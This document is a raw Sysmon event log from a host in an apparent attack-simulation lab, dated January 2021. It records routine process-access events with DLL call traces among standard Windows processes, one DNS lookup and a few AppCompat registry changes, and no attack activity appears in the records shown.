13:58:38.179{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.148{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.148{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.132{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.121{59A5CD1D-8E56-6005-2E00-00000000A301}246442.23.48.23.in-addr.arpa.0type: 12 a23-48-23-42.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000013190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.008{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.008{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.804{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.804{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.726{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\IEFRAME.dll+15755|C:\Windows\SYSTEM32\IEFRAME.dll+156d3|C:\Windows\SYSTEM32\IEFRAME.dll+1564d|C:\Windows\SYSTEM32\IEFRAME.dll+1545e|C:\Windows\SYSTEM32\IEFRAME.dll+2a8230|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.679{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.679{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.679{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000013225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000013224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 13241300x800000000000000013223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBSetValue2021-01-18 13:58:39.476{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet Explorer\iexplore.exeBinary Data 12241200x800000000000000013222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBDeleteValue2021-01-18 13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet 
Explorer\iexplore.exe 10341000x800000000000000013221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
